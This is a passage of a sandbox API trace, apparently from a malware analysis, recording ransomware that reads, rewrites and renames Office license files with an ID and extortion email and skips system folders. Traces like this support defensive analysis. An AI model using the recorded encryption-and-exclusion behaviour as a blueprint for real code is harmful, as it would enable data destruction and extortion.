(HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0106.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2411f0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.990] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11614) returned 1 [0106.990] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0106.990] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0106.992] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.992] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0106.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.993] CloseHandle (hObject=0x45c) returned 1 [0106.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0106.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0106.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0106.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0106.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0106.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0106.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.993] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0106.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0106.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0106.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.994] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe86caea3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe86caea3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe88223de, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_OEM_Perp-pl.xrm-ms", cAlternateFileName="POED01~1.XRM")) returned 1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.994] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0106.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0106.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0106.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0106.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0106.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0106.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.995] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10655) returned 1 [0106.995] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0106.995] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0106.998] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.998] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0106.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.998] CloseHandle (hObject=0x45c) returned 1 [0106.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0106.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0106.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0106.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0106.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0106.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0106.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.999] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0106.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0106.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0106.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0106.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.999] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe86a4c3e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe86a4c3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe87fc17f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5130, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PO3BD4~1.XRM")) returned 1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.000] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0107.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0107.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0107.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0107.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0107.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0107.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.001] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20784) returned 1 [0107.001] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5130) returned 0x24c1d0 [0107.001] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5130, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5130, lpOverlapped=0x0) returned 1 [0107.004] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.004] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5130, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5130, lpOverlapped=0x0) returned 1 [0107.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.004] CloseHandle (hObject=0x45c) returned 1 [0107.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0107.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0107.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0107.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.005] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0107.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0107.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0107.009] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe86a4c3e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe86a4c3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8848637, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d57, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="POC92B~1.XRM")) returned 1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.009] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.009] 